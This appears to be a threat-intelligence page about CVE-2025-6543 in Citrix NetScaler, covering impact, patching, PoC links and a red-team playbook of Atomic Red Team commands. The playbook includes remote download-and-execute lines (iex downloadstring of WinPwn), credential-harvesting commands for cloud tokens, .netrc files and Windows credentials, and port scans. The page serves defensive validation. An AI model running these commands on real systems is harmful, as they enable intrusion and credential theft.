CVE-2025-6543
Overview
This vulnerability is a memory overflow condition occurring in the NetScaler ADC and NetScaler Gateway components when configured as Gateway or AAA virtual servers. The root cause lies in improper bounds checking during processing of specific VPN virtual server functions such as ICA Proxy, CVPN, and RDP Proxy. This flaw allows unintended control flow manipulation due to corrupted memory state within the affected modules.
Vulnerability Description
Memory overflow vulnerability leading to unintended control flow and Denial of Service in NetScaler ADC and NetScaler Gateway when configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server
Impact
An unauthenticated attacker can exploit this vulnerability remotely to cause denial of service by crashing the affected NetScaler ADC or Gateway service, disrupting VPN and AAA functionalities. This can lead to service outages affecting remote access and authentication services critical to enterprise operations. The attack requires no user interaction and can be performed over the network, potentially impacting availability and business continuity.
Solution
Citrix has published a security advisory (CTX694788) addressing this issue for NetScaler ADC and NetScaler Gateway products. Administrators should apply the vendor-released patches as specified in the advisory to affected product versions. Detailed patch instructions and version-specific fixes are available at the Citrix support portal under article CTX694788. No alternative workarounds are recommended beyond applying the official updates promptly.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical memory overflow vulnerability has been identified in specific configurations of NetScaler ADC and NetScaler Gateway, particularly when set up as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. This flaw allows attackers to exploit the memory management of the affected products, potentially leading to unintended control flow alterations. Such control flow manipulation can result in a Denial of Service (DoS), effectively disrupting the availability of services provided by the affected systems. The high severity of this vulnerability, reflected in its CVSS score of 9.8, underscores the urgent need for organizations utilizing these products to understand the technical intricacies and implications of this threat.
Attack vectors for this vulnerability are varied but primarily focus on the exploitation of improperly managed memory regions. An attacker could craft malicious input that, when processed by the affected systems, triggers the overflow condition. This could occur through various means, such as sending specially crafted packets to the VPN or AAA virtual servers. Once the overflow is executed, the attacker may gain the ability to manipulate the control flow of the application, leading to service interruptions or even unauthorized access to sensitive data. Given the nature of the services provided by NetScaler products, including secure remote access and application delivery, the potential for exploitation is significant and poses a serious risk to organizations relying on these technologies.
The real-world impact of this vulnerability is profound, particularly for businesses that depend on NetScaler for critical operations. A successful exploitation could lead to prolonged service outages, impacting user access to applications and services. This disruption can result in financial losses, damage to reputation, and erosion of customer trust. Furthermore, organizations may face regulatory scrutiny if sensitive data is compromised during an attack, leading to potential legal ramifications. The business risk extends beyond immediate operational impacts; it can also affect long-term strategic initiatives, particularly for enterprises that prioritize digital transformation and cloud adoption.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching affected systems is paramount, as vendors typically release security updates to address such vulnerabilities. Implementing robust monitoring solutions can aid in detecting unusual patterns of behavior that may indicate an attempted exploitation. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations. Employing network segmentation can also limit the attack surface, ensuring that even if an attacker gains access, their ability to move laterally within the network is restricted.
In conclusion, the memory overflow vulnerability in NetScaler ADC and Gateway products represents a significant threat to organizations leveraging these technologies. The potential for service disruption and unauthorized access necessitates immediate attention from cybersecurity teams. By understanding the technical details, recognizing potential attack vectors, assessing real-world impacts, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this critical vulnerability and ensure the continued availability and integrity of their services.
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2025-6543, indicating increased adversary engagement targeting vulnerable NetScaler ADC and Gateway configurations. While the overall exploit trend remains stable according to EPSS metrics, our telemetry reveals a marked escalation in detection events, suggesting attackers are intensifying reconnaissance and potential exploitation efforts. This uptick is further underscored by the emergence of multiple new proof-of-concept exploits, which lower the technical barrier for threat actors to leverage this critical memory overflow vulnerability. Although ransomware usage linked to this vulnerability remains unconfirmed, the expanded exploit toolkit and rising detection frequency elevate the risk profile for affected organizations. Consequently, the threat level should be considered heightened, reflecting an environment where opportunistic and possibly more sophisticated actors are increasingly poised to exploit this weakness, thereby amplifying the potential for service disruption and unauthorized access.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:ndcpp:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Application Delivery Controller | All |
cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:-:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway | All |
cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
abrewer251/CVE-2025-6543_CitrixNetScaler_PoC
Multi-host, multi-port scanner and auditor for CVE-2025-6543-affected NetScaler devices. Supports SNMP and SSH enumerati...
|
abrewer251 | 5 | 1 | 2025-07-03 | View |
|
grupooruss/Citrix-cve-2025-6543
Script para determinar si Citrix es vulnerable al CVE-2025-6543
|
grupooruss | 5 | 0 | 2025-06-26 | View |
|
lex1010/CVE-2025-6543
Citrix Bleed 2 PoC
|
lex1010 | 0 | 0 | 2025-06-30 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-6543 |
| support.citrix.com |
GitHub CVE
|
https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694788 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-6543 |